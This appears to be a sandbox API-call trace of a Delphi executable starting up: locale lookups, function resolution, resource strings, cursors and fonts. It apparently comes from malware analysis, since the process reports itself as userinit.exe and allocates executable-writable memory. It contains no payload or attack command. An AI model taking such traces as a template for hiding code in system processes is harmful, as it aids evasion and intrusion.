[0149.754] GetLocaleInfoA (in: Locale=0x409, LCType=0x40, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="September") returned 10
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x4d, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Oct") returned 4
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x41, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="October") returned 8
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x4e, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Nov") returned 4
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x42, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="November") returned 9
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x4f, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Dec") returned 4
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x43, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="December") returned 9
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x37, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Sun") returned 4
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x30, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Sunday") returned 7
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x31, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Mon") returned 4
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x2a, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Monday") returned 7
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x32, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Tue") returned 4
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x2b, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Tuesday") returned 8
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x33, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Wed") returned 4
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x2c, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Wednesday") returned 10
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x34, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Thu") returned 4
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x2d, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Thursday") returned 9
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x35, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Fri") returned 4
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x2e, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Friday") returned 7
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x36, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Sat") returned 4
[0149.755] GetLocaleInfoA (in: Locale=0x409, LCType=0x2f, lpLCData=0x18f4bc, cchData=256 | out: lpLCData="Saturday") returned 9
[0149.756] GetThreadLocale () returned 0x409
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x14, lpLCData=0x18f518, cchData=256 | out: lpLCData="$") returned 2
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x1b, lpLCData=0x18f518, cchData=256 | out: lpLCData="0") returned 2
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x1c, lpLCData=0x18f518, cchData=256 | out: lpLCData="0") returned 2
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0xf, lpLCData=0x18f610, cchData=2 | out: lpLCData=",") returned 2
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0xe, lpLCData=0x18f610, cchData=2 | out: lpLCData=".") returned 2
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x19, lpLCData=0x18f518, cchData=256 | out: lpLCData="2") returned 2
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x1d, lpLCData=0x18f610, cchData=2 | out: lpLCData="/") returned 2
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x1f, lpLCData=0x18f518, cchData=256 | out: lpLCData="M/d/yyyy") returned 9
[0149.756] GetThreadLocale () returned 0x409
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18f4e4, cchData=256 | out: lpLCData="1") returned 2
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x20, lpLCData=0x18f518, cchData=256 | out: lpLCData="dddd, MMMM dd, yyyy") returned 20
[0149.756] GetThreadLocale () returned 0x409
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x1009, lpLCData=0x18f4e4, cchData=256 | out: lpLCData="1") returned 2
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x1e, lpLCData=0x18f610, cchData=2 | out: lpLCData=":") returned 2
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x28, lpLCData=0x18f518, cchData=256 | out: lpLCData="AM") returned 3
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x29, lpLCData=0x18f518, cchData=256 | out: lpLCData="PM") returned 3
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x25, lpLCData=0x18f518, cchData=256 | out: lpLCData="0") returned 2
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x23, lpLCData=0x18f518, cchData=256 | out: lpLCData="0") returned 2
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0x1005, lpLCData=0x18f518, cchData=256 | out: lpLCData="0") returned 2
[0149.756] GetLocaleInfoA (in: Locale=0x409, LCType=0xc, lpLCData=0x18f610, cchData=2 | out: lpLCData=",") returned 2
[0149.757] GetModuleHandleA (lpModuleName="oleaut32.dll") returned 0x758f0000
[0149.757] GetProcAddress (hModule=0x758f0000, lpProcName="VariantChangeTypeEx") returned 0x758f4c28
[0149.757] GetProcAddress (hModule=0x758f0000, lpProcName="VarNeg") returned 0x7596c802
[0149.757] GetProcAddress (hModule=0x758f0000, lpProcName="VarNot") returned 0x7596ec66
[0149.757] GetProcAddress (hModule=0x758f0000, lpProcName="VarAdd") returned 0x75915934
[0149.757] GetProcAddress (hModule=0x758f0000, lpProcName="VarSub") returned 0x7596d332
[0149.757] GetProcAddress (hModule=0x758f0000, lpProcName="VarMul") returned 0x7596dbd4
[0149.757] GetProcAddress (hModule=0x758f0000, lpProcName="VarDiv") returned 0x7596e405
[0149.758] GetProcAddress (hModule=0x758f0000, lpProcName="VarIdiv") returned 0x7596f00a
[0149.758] GetProcAddress (hModule=0x758f0000, lpProcName="VarMod") returned 0x7596f15e
[0149.758] GetProcAddress (hModule=0x758f0000, lpProcName="VarAnd") returned 0x75915a98
[0149.758] GetProcAddress (hModule=0x758f0000, lpProcName="VarOr") returned 0x7596ecfa
[0149.758] GetProcAddress (hModule=0x758f0000, lpProcName="VarXor") returned 0x7596ee2e
[0149.758] GetProcAddress (hModule=0x758f0000, lpProcName="VarCmp") returned 0x7590b0dc
[0149.758] GetProcAddress (hModule=0x758f0000, lpProcName="VarI4FromStr") returned 0x75906fab
[0149.758] GetProcAddress (hModule=0x758f0000, lpProcName="VarR4FromStr") returned 0x759101a0
[0149.758] GetProcAddress (hModule=0x758f0000, lpProcName="VarR8FromStr") returned 0x7590699e
[0149.758] GetProcAddress (hModule=0x758f0000, lpProcName="VarDateFromStr") returned 0x75916ba7
[0149.759] GetProcAddress (hModule=0x758f0000, lpProcName="VarCyFromStr") returned 0x75936c12
[0149.759] GetProcAddress (hModule=0x758f0000, lpProcName="VarBoolFromStr") returned 0x7590dbd1
[0149.759] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromCy") returned 0x75917fdc
[0149.759] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromDate") returned 0x75907a2a
[0149.759] GetProcAddress (hModule=0x758f0000, lpProcName="VarBstrFromBool") returned 0x75910355
[0149.759] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName="") returned 0xa8
[0149.759] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=1, lpName=0x0) returned 0xa0
[0149.759] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xac
[0149.760] GetModuleHandleA (lpModuleName="USER32.DLL") returned 0x757b0000
[0149.760] GetDC (hWnd=0x0) returned 0x480107e1
[0149.760] GetDeviceCaps (hdc=0x480107e1, index=90) returned 96
[0149.760] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0149.760] GetDC (hWnd=0x0) returned 0x480107e1
[0149.760] GetDeviceCaps (hdc=0x480107e1, index=104) returned 0
[0149.760] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0149.760] CreatePalette (plpal=0x18f274) returned 0x6108071a
[0149.760] GetStockObject (i=7) returned 0x1b00017
[0149.760] GetStockObject (i=5) returned 0x1900015
[0149.760] GetStockObject (i=13) returned 0x18a002e
[0149.761] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027
[0149.761] MulDiv (nNumber=8, nNumerator=96, nDenominator=72) returned 11
[0149.761] LoadStringA (in: hInstance=0x2950000, uID=0xff3d, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Alt+") returned 0x4
[0149.761] LoadStringA (in: hInstance=0x2950000, uID=0xff3c, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Ctrl+") returned 0x5
[0149.761] LoadStringA (in: hInstance=0x2950000, uID=0xff3b, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Shift+") returned 0x6
[0149.761] LoadStringA (in: hInstance=0x2950000, uID=0xff3a, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Del") returned 0x3
[0149.761] LoadStringA (in: hInstance=0x2950000, uID=0xff39, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Ins") returned 0x3
[0149.761] LoadStringA (in: hInstance=0x2950000, uID=0xff38, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Down") returned 0x4
[0149.761] LoadStringA (in: hInstance=0x2950000, uID=0xff37, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Right") returned 0x5
[0149.761] LoadStringA (in: hInstance=0x2950000, uID=0xff36, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Up") returned 0x2
[0149.761] LoadStringA (in: hInstance=0x2950000, uID=0xff35, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Left") returned 0x4
[0149.761] LoadStringA (in: hInstance=0x2950000, uID=0xff34, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Home") returned 0x4
[0149.761] LoadStringA (in: hInstance=0x2950000, uID=0xff33, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="End") returned 0x3
[0149.762] LoadStringA (in: hInstance=0x2950000, uID=0xff32, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="PgDn") returned 0x4
[0149.762] LoadStringA (in: hInstance=0x2950000, uID=0xff31, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="PgUp") returned 0x4
[0149.762] LoadStringA (in: hInstance=0x2950000, uID=0xff30, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Space") returned 0x5
[0149.762] LoadStringA (in: hInstance=0x2950000, uID=0xff4f, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Enter") returned 0x5
[0149.762] LoadStringA (in: hInstance=0x2950000, uID=0xff4e, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Esc") returned 0x3
[0149.762] LoadStringA (in: hInstance=0x2950000, uID=0xff4d, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Tab") returned 0x3
[0149.762] LoadStringA (in: hInstance=0x2950000, uID=0xff4c, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="BkSp") returned 0x4
[0149.762] RegisterClipboardFormatA (lpszFormat="commdlg_help") returned 0xc0eb
[0149.762] RegisterClipboardFormatA (lpszFormat="commdlg_FindReplace") returned 0xc0fc
[0149.762] GetCurrentThreadId () returned 0x524
[0149.762] GlobalAddAtomA (lpString="WndProcPtr0295000000000524") returned 0xc11b
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xfefc, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Window Text") returned 0xb
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xfefb, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Window Frame") returned 0xc
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xfefa, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Window Background") returned 0x11
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xfef9, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="3D Light") returned 0x8
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xfef8, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="3D Dark Shadow") returned 0xe
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xfef7, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Scroll Bar") returned 0xa
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xfef6, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="None") returned 0x4
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xfef5, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Menu Text") returned 0x9
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xfef4, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Menu Background") returned 0xf
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xfef3, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Info Text") returned 0x9
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xfef2, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Info Background") returned 0xf
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xfef1, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Inactive Caption Text") returned 0x15
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xfef0, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Inactive Caption") returned 0x10
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xff0f, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Inactive Border") returned 0xf
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xff0e, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Highlight Text") returned 0xe
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xff0d, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Highlight Background") returned 0x14
[0149.763] LoadStringA (in: hInstance=0x2950000, uID=0xff0c, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Gray Text") returned 0x9
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff0b, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Default") returned 0x7
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff0a, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Caption Text") returned 0xc
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff09, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Button Text") returned 0xb
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff08, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Button Shadow") returned 0xd
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff07, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Button Highlight") returned 0x10
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff06, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Button Face") returned 0xb
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff05, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Background") returned 0xa
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff04, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Application Workspace") returned 0x15
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff03, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Active Caption") returned 0xe
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff02, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Active Border") returned 0xd
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff01, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Medium Gray") returned 0xb
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff00, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Cream") returned 0x5
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff1f, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Sky Blue") returned 0x8
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff1e, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Money Green") returned 0xb
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff1d, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="White") returned 0x5
[0149.764] LoadStringA (in: hInstance=0x2950000, uID=0xff1c, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Aqua") returned 0x4
[0149.765] LoadStringA (in: hInstance=0x2950000, uID=0xff1b, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Fuchsia") returned 0x7
[0149.765] LoadStringA (in: hInstance=0x2950000, uID=0xff1a, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Blue") returned 0x4
[0149.765] LoadStringA (in: hInstance=0x2950000, uID=0xff19, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Yellow") returned 0x6
[0149.765] LoadStringA (in: hInstance=0x2950000, uID=0xff18, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Lime") returned 0x4
[0149.765] LoadStringA (in: hInstance=0x2950000, uID=0xff17, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Red") returned 0x3
[0149.765] LoadStringA (in: hInstance=0x2950000, uID=0xff16, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Silver") returned 0x6
[0149.765] LoadStringA (in: hInstance=0x2950000, uID=0xff15, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Gray") returned 0x4
[0149.765] LoadStringA (in: hInstance=0x2950000, uID=0xff14, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Teal") returned 0x4
[0149.765] LoadStringA (in: hInstance=0x2950000, uID=0xff13, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Purple") returned 0x6
[0149.765] LoadStringA (in: hInstance=0x2950000, uID=0xff12, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Navy") returned 0x4
[0149.765] LoadStringA (in: hInstance=0x2950000, uID=0xff11, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Olive") returned 0x5
[0149.765] LoadStringA (in: hInstance=0x2950000, uID=0xff10, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Green") returned 0x5
[0149.765] LoadStringA (in: hInstance=0x2950000, uID=0xff2f, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Maroon") returned 0x6
[0149.765] LoadStringA (in: hInstance=0x2950000, uID=0xff2e, lpBuffer=0x18f270, cchBufferMax=1024 | out: lpBuffer="Black") returned 0x5
[0149.765] RegisterClipboardFormatA (lpszFormat="Delphi Picture") returned 0xc157
[0149.765] RegisterClipboardFormatA (lpszFormat="Delphi Component") returned 0xc158
[0149.766] GetVersion () returned 0x1db10106
[0149.766] GetCurrentProcessId () returned 0x734
[0149.766] GlobalAddAtomA (lpString="Delphi00000734") returned 0xc11e
[0149.766] GetCurrentThreadId () returned 0x524
[0149.766] GlobalAddAtomA (lpString="ControlOfs0295000000000524") returned 0xc11a
[0149.766] RegisterClipboardFormatA (lpszFormat="ControlOfs0295000000000524") returned 0xc179
[0149.766] GetProcAddress (hModule=0x757b0000, lpProcName="GetMonitorInfoA") returned 0x757bc34e
[0149.766] GetProcAddress (hModule=0x757b0000, lpProcName="GetSystemMetrics") returned 0x757c67cf
[0149.766] GetSystemMetrics (nIndex=19) returned 1
[0149.766] GetSystemMetrics (nIndex=75) returned 1
[0149.766] SystemParametersInfoA (in: uiAction=0x68, uiParam=0x0, pvParam=0x2a71320, fWinIni=0x0 | out: pvParam=0x2a71320) returned 1
[0149.766] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0149.766] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0149.767] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ff9) returned 0x2011b
[0149.767] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8b) returned 0x1001b
[0149.767] LoadCursorA (hInstance=0x0, lpCursorName=0x7f8a) returned 0x10019
[0149.767] LoadCursorA (hInstance=0x0, lpCursorName=0x7f88) returned 0x10017
[0149.767] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffa) returned 0x801b1
[0149.767] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffb) returned 0x701af
[0149.768] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffc) returned 0x801a9
[0149.768] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffd) returned 0x150067
[0149.768] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7fff) returned 0x80229
[0149.768] LoadCursorA (hInstance=0x2950000, lpCursorName=0x7ffe) returned 0x901f9
[0149.769] LoadCursorA (hInstance=0x0, lpCursorName=0x7f02) returned 0x10007
[0149.769] LoadCursorA (hInstance=0x0, lpCursorName=0x7f04) returned 0x1000b
[0149.769] LoadCursorA (hInstance=0x0, lpCursorName=0x7f84) returned 0x10011
[0149.769] LoadCursorA (hInstance=0x0, lpCursorName=0x7f82) returned 0x1000d
[0149.769] LoadCursorA (hInstance=0x0, lpCursorName=0x7f85) returned 0x10013
[0149.769] LoadCursorA (hInstance=0x0, lpCursorName=0x7f83) returned 0x1000f
[0149.769] LoadCursorA (hInstance=0x0, lpCursorName=0x7f86) returned 0x10015
[0149.769] LoadCursorA (hInstance=0x0, lpCursorName=0x7f01) returned 0x10005
[0149.769] LoadCursorA (hInstance=0x0, lpCursorName=0x7f03) returned 0x10009
[0149.769] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003
[0149.769] GetKeyboardLayout (idThread=0x0) returned 0x4090409
[0149.770] GetDC (hWnd=0x0) returned 0x480107e1
[0149.770] GetDeviceCaps (hdc=0x480107e1, index=90) returned 96
[0149.770] ReleaseDC (hWnd=0x0, hDC=0x480107e1) returned 1
[0149.770] GetProcAddress (hModule=0x757b0000, lpProcName="EnumDisplayMonitors") returned 0x757c34a3
[0149.770] EnumDisplayMonitors (hdc=0x0, lprcClip=0x0, lpfnEnum=0x29a9a60, dwData=0x2a7156c) returned 1
[0149.770] SystemParametersInfoA (in: uiAction=0x1f, uiParam=0x3c, pvParam=0x18f5db, fWinIni=0x0 | out: pvParam=0x18f5db) returned 1
[0149.770] CreateFontIndirectA (lplf=0x18f5db) returned 0x2c0a0851
[0149.770] GetObjectA (in: h=0x2c0a0851, c=60, pv=0x18f3cc | out: pv=0x18f3cc) returned 60
[0149.770] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x18f487, fWinIni=0x0 | out: pvParam=0x18f487) returned 1
[0149.771] CreateFontIndirectA (lplf=0x18f563) returned 0x380a083d
[0149.771] GetObjectA (in: h=0x380a083d, c=60, pv=0x18f3cc | out: pv=0x18f3cc) returned 60
[0149.771] CreateFontIndirectA (lplf=0x18f527) returned 0x2e0a0873
[0149.771] GetObjectA (in: h=0x2e0a0873, c=60, pv=0x18f3cc | out: pv=0x18f3cc) returned 60
[0149.771] LoadIconA (hInstance=0x0, lpIconName="MAINICON") returned 0x0
[0149.771] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x18f53b, nSize=0x100 | out: lpFilename="C:\\Windows\\System32\\userinit.exe" (normalized: "c:\\windows\\system32\\userinit.exe")) returned 0x20
[0149.771] OemToCharA (in: pSrc="C:\\Windows\\System32\\userinit.exe", pDst=0x18f53b | out: pDst="C:\\Windows\\System32\\userinit.exe") returned 1
[0149.771] VirtualAlloc (lpAddress=0x0, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x40) returned 0x120000
[0149.772] GetKeyboardLayoutList (in: nBuff=64, lpList=0x18f4bc | out: lpList=0x18f4bc) returned 1
[0149.773] GetModuleHandleA (lpModuleName="USER32") returned 0x757b0000
[0149.773] GetProcAddress (hModule=0x757b0000, lpProcName="AnimateWindow") returned 0x757e0620
[0149.774] GetModuleHandleA (lpModuleName="comctl32.dll") returned 0x6d720000
[0149.774] GetProcAddress (hModule=0x6d720000, lpProcName="InitializeFlatSB") returned 0x6d75266f
[0149.774] GetProcAddress (hModule=0x6d720000, lpProcName="UninitializeFlatSB") returned 0x6d752542
[0149.774] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollProp") returned 0x6d751d29
[0149.774] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollProp") returned 0x6d75238d
[0149.774] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_EnableScrollBar") returned 0x6d7520c9
[0149.774] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_ShowScrollBar") returned 0x6d751fdb
[0149.774] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollRange") returned 0x6d751e8d
[0149.774] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollInfo") returned 0x6d751f0f
[0149.774] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_GetScrollPos") returned 0x6d751ccd
[0149.775] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollPos") returned 0x6d75216d
[0149.775] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollInfo") returned 0x6d7522be
[0149.775] GetProcAddress (hModule=0x6d720000, lpProcName="FlatSB_SetScrollRange") returned 0x6d7521e2
[0149.775] GetModuleHandleA (lpModuleName="User32.dll") returned 0x757b0000
[0149.775] GetProcAddress (hModule=0x757b0000, lpProcName="SetLayeredWindowAttributes") returned 0x757ba6dc
[0149.775] RegisterClipboardFormatA (lpszFormat="TaskbarCreated") returned 0xc078
[0149.775] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x76a20000
[0149.775] GetProcAddress (hModule=0x76a20000, lpProcName="CoCreateInstanceEx") returned 0x76a69d4e
[0149.775] GetProcAddress (hModule=0x76a20000, lpProcName="CoInitializeEx") returned 0x76a609ad
[0149.775] GetProcAddress (hModule=0x76a20000, lpProcName="CoAddRefServerProcess") returned 0x76a83cf3
[0149.776] GetProcAddress (hModule=0x76a20000, lpProcName="CoReleaseServerProcess") returned 0x76a84314
[0149.776] GetProcAddress (hModule=0x76a20000, lpProcName="CoResumeClassObjects") returned 0x76a2ea02
[0149.776] GetProcAddress (hModule=0x76a20000, lpProcName="CoSuspendClassObjects") returned 0x76a8bb02
[0149.776] LoadStringA (in: hInstance=0x2950000, uID=0xff59, lpBuffer=0x18f21c, cchBufferMax=1024 | out: lpBuffer="Metafiles") returned 0x9
[0149.776] CharLowerBuffA (in: lpsz="wmf", cchLength=0x3 | out: lpsz="wmf") returned 0x3
[0149.776] LoadStringA (in: hInstance=0x2950000, uID=0xff5a, lpBuffer=0x18f21c, cchBufferMax=1024 | out: lpBuffer="Enhanced Metafiles") returned 0x12
[0149.776] CharLowerBuffA (in: lpsz="emf", cchLength=0x3 | out: lpsz="emf") returned 0x3
[0149.776] LoadStringA (in: hInstance=0x2950000, uID=0xff5b, lpBuffer=0x18f21c, cchBufferMax=1024 | out: lpBuffer="Icons") returned 0x5
[0149.776] CharLowerBuffA (in: lpsz="ico", cchLength=0x3 | out: lpsz="ico") returned 0x3
[0149.776] LoadStringA (in: hInstance=0x2950000, uID=0xff5c, lpBuffer=0x18f21c, cchBufferMax=1024 | out: lpBuffer="Bitmaps") returned 0x7
[0149.776] CharLowerBuffA (in: lpsz="bmp", cchLength=0x3 | out: lpsz="bmp") returned 0x3
[0149.776] SetErrorMode (uMode=0x8000) returned 0x1
[0149.776] LoadLibraryA (lpLibFileName="olepro32.dll") returned 0x6d820000
[0149.779] SetErrorMode (uMode=0x1) returned 0x8000
[0149.779] GetProcAddress (hModule=0x6d820000, lpProcName="OleCreatePropertyFrame") returned 0x6d8220ea
[0149.779] GetProcAddress (hModule=0x6d820000, lpProcName="OleCreateFontIndirect") returned 0x6d8220b7
[0149.780] GetProcAddress (hModule=0x6d820000, lpProcName="OleCreatePictureIndirect") returned 0x6d8220c8
[0149.780] GetProcAddress (hModule=0x6d820000, lpProcName="OleLoadPicture") returned 0x6d8220d9
[0149.780] SysReAllocStringLen (in: pbstr=0x2a3fa98*=0x0, psz="EJwsclUnsupportedException", len=0x1a | out: pbstr=0x2a3fa98*="EJwsclUnsupportedException") returned 1
[0149.780] SysReAllocStringLen (in: pbstr=0x2a3fa80*=0x0, psz="EJwsclPIDException", len=0x12 | out: pbstr=0x2a3fa80*="EJwsclPIDException") returned 1
